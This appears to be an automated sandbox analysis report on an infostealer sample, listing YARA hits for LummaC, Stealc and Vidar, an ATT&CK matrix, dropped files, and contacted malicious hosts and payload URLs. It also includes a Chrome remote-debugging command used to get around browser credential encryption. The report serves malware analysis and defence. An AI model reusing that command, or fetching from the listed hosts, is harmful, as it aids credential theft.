Source: Yara match	File source: Process Memory Space: file.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: d985563cac.exe PID: 5796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: d985563cac.exe PID: 4600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: d985563cac.exe PID: 8048, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: f1628a2a52.exe PID: 1608, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: d985563cac.exe PID: 5796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: d985563cac.exe PID: 4600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: d985563cac.exe PID: 8048, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2124046353.000000000059E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2697522717.0000000005530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2991880808.000000000071B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2124461311.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2997900690.0000000000B61000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.2903532225.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2744434040.000000000179E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1688422254.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2739858298.0000000000B61000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 25045de666.exe PID: 5592, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7288, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C670C40 sqlite3_bind_zeroblob,	0_2_6C670C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C670D60 sqlite3_bind_parameter_name,	0_2_6C670D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C598EA0 sqlite3_clear_bindings,	0_2_6C598EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C670B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C670B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C596410 bind,WSAGetLastError,	0_2_6C596410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6C59C050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C596070 PR_Listen,	0_2_6C596070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59C030 sqlite3_bind_parameter_count,	0_2_6C59C030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5960B0 listen,WSAGetLastError,	0_2_6C5960B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5222D0 sqlite3_bind_blob,	0_2_6C5222D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5963C0 PR_Bind,	0_2_6C5963C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C599400 sqlite3_bind_int64,	0_2_6C599400
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5994C0 sqlite3_bind_text,	0_2_6C5994C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5994F0 sqlite3_bind_text16,	0_2_6C5994F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C599480 sqlite3_bind_null,	0_2_6C599480

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	141 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	411 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Native API	21 Scheduled Task/Job	2 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	1 Input Capture	12 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	11 Registry Run Keys / Startup Folder	1 Extra Window Memory Injection	24 Obfuscated Files or Information	Security Account Manager	359 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	21 Scheduled Task/Job	Login Hook	12 Process Injection	23 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	1 Email Collection	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Scheduled Task/Job	1 Timestomp	LSA Secrets	1191 Security Software Discovery	SSH	1 Input Capture	4 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	115 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Bypass User Account Control	DCSync	581 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Extra Window Memory Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Masquerading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Modify Registry	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	581 Virtualization/Sandbox Evasion	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	12 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	HEUR/AGEN.1320706
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\n4e23hz[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://80.82.65.70/add?substr=mixtwo&s=three&sub=empw	0%	Avira URL Cloud	safe
https://atten-supporse.biz/api-21	100%	Avira URL Cloud	malware
http://80.82.65.70/add?substr=mixtwo&s=three&sub=empy	0%	Avira URL Cloud	safe
http://185.215.113.206/68b591d6548ec281/msvcp140.dllY	100%	Avira URL Cloud	malware
https://atten-supporse.biz/Z_b	100%	Avira URL Cloud	malware
http://80.82.65.70/files/download)	0%	Avira URL Cloud	safe
http://win.mail.ru/cgi-bin/sentmsg?mailto=%sCan	0%	Avira URL Cloud	safe
https://atten-supporse.biz/YS	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
example.org	93.184.215.14	true	false	high
prod.classify-client.prod.webservices.mozgcp.net	35.190.72.216	true	false	high
prod.balrog.prod.cloudops.mozgcp.net	35.244.181.201	true	false	high
prod.detectportal.prod.cloudops.mozgcp.net	34.107.221.82	true	false	high
plus.l.google.com	172.217.17.46	true	false	high
discord.com	162.159.128.233	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
contile.services.mozilla.com	34.117.188.166	true	false	high
youtube.com	142.250.181.78	true	false	high
prod.content-signature-chains.prod.webservices.mozgcp.net	34.160.144.191	true	false	high
atten-supporse.biz	104.21.80.1	true	false	high
bg.microsoft.map.fastly.net	199.232.214.172	true	false	high
ipv4only.arpa	192.0.0.171	true	false	high
prod.ads.prod.webservices.mozgcp.net	34.117.188.166	true	false	high
www.google.com	142.250.181.68	true	false	high
ip-api.com	208.95.112.1	true	false	high
api.mylnikov.org	172.67.196.114	true	false	high
icanhazip.com	104.16.185.241	true	false	high
js.monitor.azure.com	unknown	unknown	false	high
spocs.getpocket.com	unknown	unknown	false	high
detectportal.firefox.com	unknown	unknown	false	high
mdec.nelreports.net	unknown	unknown	false	high
231.12.13.0.in-addr.arpa	unknown	unknown	false	unknown
content-signature-2.cdn.mozilla.net	unknown	unknown	false	high
shavar.services.mozilla.com	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://185.215.113.206/	false	high
formy-spill.biz	false	high
http://185.215.113.206/68b591d6548ec281/nss3.dll	false	high
https://atten-supporse.biz/api	false	high
atten-supporse.biz	false	high
http://icanhazip.com/	false	high
dwell-exclaim.biz	false	high
http://80.82.65.70/dll/download	false	high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false	high
http://ip-api.com/line/?fields=hosting	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-	firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	false		high
http://detectportal.firefox.com/	firefox.exe, 00000021.00000002.3090059875.00000273A4919000.00000004.00000800.00020000.00000000.sdmp	false		high
https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%	firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://merino.services.mozilla.com/api/v1/suggest	firefox.exe, 00000021.00000002.3052932070.00000273978D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3029399801.000001F80C072000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D7EC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://json-schema.org/draft/2019-09/schema.	firefox.exe, 00000021.00000002.3144749087.00000273A7803000.00000004.00000800.00020000.00000000.sdmp	false		high
https://spocs.getpocket.com/spocs	firefox.exe, 00000021.00000003.2970660238.00000273AB1E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill	firefox.exe, 00000021.00000002.3097416157.00000273A5143000.00000004.00000800.00020000.00000000.sdmp	false		high
https://screenshots.firefox.com	firefox.exe, 00000021.00000002.3075223949.00000273A3A08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E05000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ads.stickyadstv.com/firefox-etp	firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/searchLOAD_DOCUMENT_NEEDS_COOKIEINHIBIT_PERSISTENT_CACHINGquery=	firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeService	firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mail.yahoo.co.jp/compose/?To=%shttps://mail.inbox.lv/compose?to=%shttps://poczta.interia.pl/	firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	false		high
https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM	firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://xhr.spec.whatwg.org/#sync-warning	firefox.exe, 00000021.00000002.3075223949.00000273A3A2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3075223949.00000273A3A12000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/exec/obidos/external-search/	firefox.exe, 00000021.00000003.2977075827.00000273A9B8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3171312999.00000273A7D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2826867526.00000273A751F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2827132194.00000273A753C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2826664325.00000273A7300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2827663613.00000273A7577000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3105017765.00000273A6C70000.00000002.08000000.00040000.00000000.sdmp	false		high
http://win.mail.ru/cgi-bin/sentmsg?mailto=%sCan	firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://atten-supporse.biz/Z_b	d985563cac.exe, 00000010.00000003.2665848570.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2690163685.000000000132F000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2770412899.0000000001331000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2663222028.000000000132F000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2688903323.000000000132F000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2664605570.0000000001333000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/mozilla-services/screenshots	firefox.exe, 00000021.00000003.2827378604.00000273A755A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2826867526.00000273A751F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2827132194.00000273A753C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2826664325.00000273A7300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2827663613.00000273A7577000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3105017765.00000273A6C70000.00000002.08000000.00040000.00000000.sdmp	false		high
https://atten-supporse.biz/z_B	d985563cac.exe, 00000010.00000003.2714140999.0000000001331000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2714429122.0000000001333000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest	firefox.exe, 00000021.00000002.3073895804.00000273A3800000.00000002.08000000.00040000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def	firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tracking-protection-issues.herokuapp.com/new	firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing	firefox.exe, 00000021.00000002.3075223949.00000273A3A2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3075223949.00000273A3A12000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report	firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	false		high
http://exslt.org/common	firefox.exe, 00000021.00000002.3063668397.00000273A3126000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ok.ru/	firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe	firefox.exe, 00000021.00000002.3073895804.00000273A3800000.00000002.08000000.00040000.00000000.sdmp	false		high
https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/	firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	file.exe, 00000000.00000002.2124046353.000000000064F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2130097033.000000000B602000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2835086612.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3063668397.00000273A31AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3029399801.000001F80C0CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D7F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://firefox.settings.services.mozilla.com/v1Failed	firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	false		high
http://win.mail.ru/cgi-bin/sentmsg?mailto=%s	firefox.exe, 00000021.00000002.3071561783.00000273A377D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.1880904083.0000000000674000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2664643426.0000000005C18000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2663356184.0000000005C2F000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2778836201.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2778700447.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2876075382.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2875457709.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=	firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D7C6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bugzilla.mo	firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3159160794.00000273A7A03000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mitmdetection.services.mozilla.com/	firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://static.adsafeprotected.com/firefox-etp-js	firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	false		high
https://outlook.live.com/default.aspx?rru=compose&to=%sresource://gre/modules/PrivateBrowsingUtils.s	firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/msvcp140.dllY	file.exe, 00000000.00000002.2124046353.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/off/def.exe	d985563cac.exe, 00000010.00000003.2975964335.0000000001322000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2998838447.0000000001326000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2974238314.0000000001345000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2975683937.0000000001348000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000002.3065632992.0000000001326000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000002.3064819303.0000000000FAB000.00000004.00000010.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.3134749628.0000000001481000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.3135076485.0000000001471000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.3132584782.0000000001490000.00000004.00000020.00020000.00000000.sdmp	false		high
https://spocs.getpocket.com/	firefox.exe, 00000021.00000002.3097416157.00000273A51EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2968260213.00000273B1D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D712000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/	d985563cac.exe, 00000012.00000002.2940566596.00000000013FA000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2830517161.0000000001489000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2857965033.0000000005C0E000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2856965234.0000000005C0E000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000002.2940566596.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2970106725.0000000001480000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.3135356272.00000000014A4000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.3060303366.0000000001480000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.3079414270.00000000014A4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://services.addons.mozilla.org/api/v4/abuse/report/addon/	firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%	firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f	firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://www.iqiyi.com/	firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://monitor.firefox.com/user/breach-stats?includeResolved=true	firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report	firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpd	file.exe, 00000000.00000002.2124046353.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpa	file.exe, 00000000.00000002.2124046353.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bugzilla.mozilla.org/show_bug.cgi?id=1584464	firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/?extsrc=mailto&url=%shttps://mail.google.com/mail/?extsrc=mailto&url=%s	firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	false		high
